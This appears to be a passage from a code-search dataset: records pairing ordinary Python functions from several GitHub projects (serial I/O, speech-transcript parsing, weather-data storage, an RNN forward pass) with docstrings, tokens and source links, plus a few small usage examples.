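print(out[50, 50], out[0, 0])  # 200 0 -- inside kept, outside zeroed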
heldersepu/GMapCatcher
0fcd85742d54449d679acf52cc019e93fdc402fe
gmapcatcher/pyGPSD/nmea/serial/serialposix.py
python
PosixSerial.flush
(self)
Flush of file like objects. In this case, wait until all data is written.
Flush of file like objects. In this case, wait until all data is written.
[ "Flush", "of", "file", "like", "objects", ".", "In", "this", "case", "wait", "until", "all", "data", "is", "written", "." ]
def flush(self): """Flush of file like objects. In this case, wait until all data is written.""" self.drainOutput()
[ "def", "flush", "(", "self", ")", ":", "self", ".", "drainOutput", "(", ")" ]
https://github.com/heldersepu/GMapCatcher/blob/0fcd85742d54449d679acf52cc019e93fdc402fe/gmapcatcher/pyGPSD/nmea/serial/serialposix.py#L487-L490
dannguyen/watson-word-watcher
c487291b0efee6da3a5de470c7bffae5728ffb3b
foo/wrangle.py
python
extract_line_level_data
(data)
return lines
data (dict): as derived from standard Watson API JSON returns: a list of dictionaries, each representing a line: { "start": 1.42, "end": 3.8, "confidence": 0.999, "words": [ { "text": "Hello", "start": 1.42, "end": 2.4, "confidence": 0.93 } ] }
data (dict): as derived from standard Watson API JSON
[ "data", "(", "dict", ")", ":", "as", "derived", "from", "standard", "Watson", "API", "JSON" ]
def extract_line_level_data(data): """ data (dict): as derived from standard Watson API JSON returns: a list of dictionaries, each representing a line: { "start": 1.42, "end": 3.8, "confidence": 0.999, "words": [ { "text": "Hello", "start": 1.42, "end": 2.4, "confidence": 0.93 } ] } """ lines = [] for result in data['results']: if result.get('alternatives'): # just pick best alternative alt = result.get('alternatives')[0] timestamps = alt['timestamps'] if timestamps: # for some reason, timestamps can be empty in some cases words = [] word_confidences = alt['word_confidence'] for idx, tobject in enumerate(alt['timestamps']): txt, tstart, tend = tobject word = OrderedDict() word["start"] = tstart word["end"] = tend word['confidence'] = word_confidences[idx][1] word["text"] = txt words.append(word) line = OrderedDict() line['start'] = words[0]['start'] line['end'] = words[-1]['end'] line['confidence'] = alt['confidence'] line['word_count'] = len(words) line['words'] = words lines.append(line) return lines
[ "def", "extract_line_level_data", "(", "data", ")", ":", "lines", "=", "[", "]", "for", "result", "in", "data", "[", "'results'", "]", ":", "if", "result", ".", "get", "(", "'alternatives'", ")", ":", "# just pick best alternative", "alt", "=", "result", "...
https://github.com/dannguyen/watson-word-watcher/blob/c487291b0efee6da3a5de470c7bffae5728ffb3b/foo/wrangle.py#L158-L202
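Feeding the function a minimal hand-built payload (field names taken from the code above, values invented) shows the line-level dictionaries it produces:

data = {'results': [{'alternatives': [{
    'confidence': 0.98,
    'timestamps': [['hello', 1.42, 2.4], ['world', 2.5, 3.8]],
    'word_confidence': [['hello', 0.93], ['world', 0.99]],
}]}]}

lines = extract_line_level_data(data)
print(lines[0]['start'], lines[0]['end'], lines[0]['word_count'])  # 1.42 3.8 2
print(lines[0]['words'][1]['text'], lines[0]['words'][1]['confidence'])  # world 0.99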
ant4g0nist/lisa.py
fb74a309a314d041d4902944a8d449650afc76db
lisa.py
python
Mach.__init__
(self, debugger)
[]
def __init__(self, debugger): self.magic = Mach.Magic() self.content = None self.path = None self.debugger = debugger
[ "def", "__init__", "(", "self", ",", "debugger", ")", ":", "self", ".", "magic", "=", "Mach", ".", "Magic", "(", ")", "self", ".", "content", "=", "None", "self", ".", "path", "=", "None", "self", ".", "debugger", "=", "debugger" ]
https://github.com/ant4g0nist/lisa.py/blob/fb74a309a314d041d4902944a8d449650afc76db/lisa.py#L1065-L1069
jim-easterbrook/pywws
31519ade415545e9cd711237b98aad33d070c1f9
src/pywws/sqlite3data.py
python
CoreStore.__delitem__
(self, i)
Delete the data item or items with index i. i must be a datetime object or a slice. If i is a single datetime then a value with that index must exist.
Delete the data item or items with index i. i must be a datetime object or a slice. If i is a single datetime then a value with that index must exist.
[ "Delete", "the", "data", "item", "or", "items", "with", "index", "i", ".", "i", "must", "be", "a", "datetime", "object", "or", "a", "slice", ".", "If", "i", "is", "a", "single", "datetime", "then", "a", "value", "with", "that", "index", "must", "exis...
def __delitem__(self, i): """Delete the data item or items with index i. i must be a datetime object or a slice. If i is a single datetime then a value with that index must exist. """ predicate, multi, params = self._predicate(i) with self._connection as con: if con.execute("DELETE FROM {} {};".format( self.table, predicate ), params).rowcount == 0 and multi is False: raise KeyError(i)
[ "def", "__delitem__", "(", "self", ",", "i", ")", ":", "predicate", ",", "multi", ",", "params", "=", "self", ".", "_predicate", "(", "i", ")", "with", "self", ".", "_connection", "as", "con", ":", "if", "con", ".", "execute", "(", "\"DELETE FROM {} {}...
https://github.com/jim-easterbrook/pywws/blob/31519ade415545e9cd711237b98aad33d070c1f9/src/pywws/sqlite3data.py#L410-L422
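The contract here (_predicate turns a datetime or slice into WHERE-clause text plus params, and a single-datetime delete must hit a row) can be sketched against an in-memory sqlite3 table; the table and column names below are made up:

import sqlite3

con = sqlite3.connect(':memory:')
con.execute("CREATE TABLE data (idx TEXT PRIMARY KEY, temp REAL)")
con.execute("INSERT INTO data VALUES (?, ?)", ('2024-01-01 00:00', 21.5))

def delete_item(con, i):
    # single-index form: exactly like the multi=False branch above
    if con.execute("DELETE FROM data WHERE idx = ?", (i,)).rowcount == 0:
        raise KeyError(i)

delete_item(con, '2024-01-01 00:00')      # removes the row
try:
    delete_item(con, '2024-01-02 00:00')
except KeyError as exc:
    print("missing:", exc)                # missing: '2024-01-02 00:00'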
d2l-ai/d2l-en
39a7d4174534740b2387b0dc5eb22f409b82ee10
d2l/mxnet.py
python
RNNLMScratch.forward
(self, X, state=None)
return self.output_layer(rnn_outputs)
Defined in :numref:`sec_rnn-scratch`
Defined in :numref:`sec_rnn-scratch`
[ "Defined", "in", ":", "numref", ":", "sec_rnn", "-", "scratch" ]
def forward(self, X, state=None): """Defined in :numref:`sec_rnn-scratch`""" embs = self.one_hot(X) rnn_outputs, _ = self.rnn(embs, state) return self.output_layer(rnn_outputs)
[ "def", "forward", "(", "self", ",", "X", ",", "state", "=", "None", ")", ":", "embs", "=", "self", ".", "one_hot", "(", "X", ")", "rnn_outputs", ",", "_", "=", "self", ".", "rnn", "(", "embs", ",", "state", ")", "return", "self", ".", "output_lay...
https://github.com/d2l-ai/d2l-en/blob/39a7d4174534740b2387b0dc5eb22f409b82ee10/d2l/mxnet.py#L736-L740
vmware-archive/liota
9dde472542edd6d1ee01f66e7d78161dfa993f8f
liota/entities/edge_systems/general_edge_system.py
python
GeneralEdgeSystem.__init__
(self, name)
Init method for GeneralEdgeSystem :param name: GeneralEdgeSystem name
Init method for GeneralEdgeSystem :param name: GeneralEdgeSystem name
[ "Init", "method", "for", "GeneralEdgeSystem", ":", "param", "name", ":", "GeneralEdgeSystem", "name" ]
def __init__(self, name): """ Init method for GeneralEdgeSystem :param name: GeneralEdgeSystem name """ super(GeneralEdgeSystem, self).__init__( name=name, entity_id=systemUUID().get_uuid(name) )
[ "def", "__init__", "(", "self", ",", "name", ")", ":", "super", "(", "GeneralEdgeSystem", ",", "self", ")", ".", "__init__", "(", "name", "=", "name", ",", "entity_id", "=", "systemUUID", "(", ")", ".", "get_uuid", "(", "name", ")", ")" ]
https://github.com/vmware-archive/liota/blob/9dde472542edd6d1ee01f66e7d78161dfa993f8f/liota/entities/edge_systems/general_edge_system.py#L41-L49